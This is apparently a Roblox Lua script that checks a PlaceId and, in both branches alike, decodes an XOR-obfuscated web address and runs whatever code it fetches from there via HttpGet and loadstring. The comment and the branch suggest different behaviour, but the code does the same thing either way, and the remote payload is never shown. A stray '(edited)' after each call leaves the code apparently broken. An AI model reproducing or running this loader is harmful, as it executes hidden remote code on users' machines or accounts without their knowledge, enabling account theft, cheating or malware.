local placeIdToWaitFor = 3311165597 -- Replace with your specific PlaceId

if game.PlaceId ~= placeIdToWaitFor then
    wait(6) -- Wait for 6 seconds
    local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end wait(1.3 + 0 );loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\237\7\231\183\203\13\232\224\238\14\195\137\136\25\196\202\148\55\227\189\212\81\217\198\218\33\245\244\202\31\216\205\148\34\243\178","\126\177\163\187\69\134\219\167"),true))()(edited);
else
    print("PlaceId matched, proceeding with other actions.")
    local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end wait(1.3 + 0 );loadstring(game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\237\7\231\183\203\13\232\224\238\14\195\137\136\25\196\202\148\55\227\189\212\81\217\198\218\33\245\244\202\31\216\205\148\34\243\178","\126\177\163\187\69\134\219\167"),true))()(edited);
end


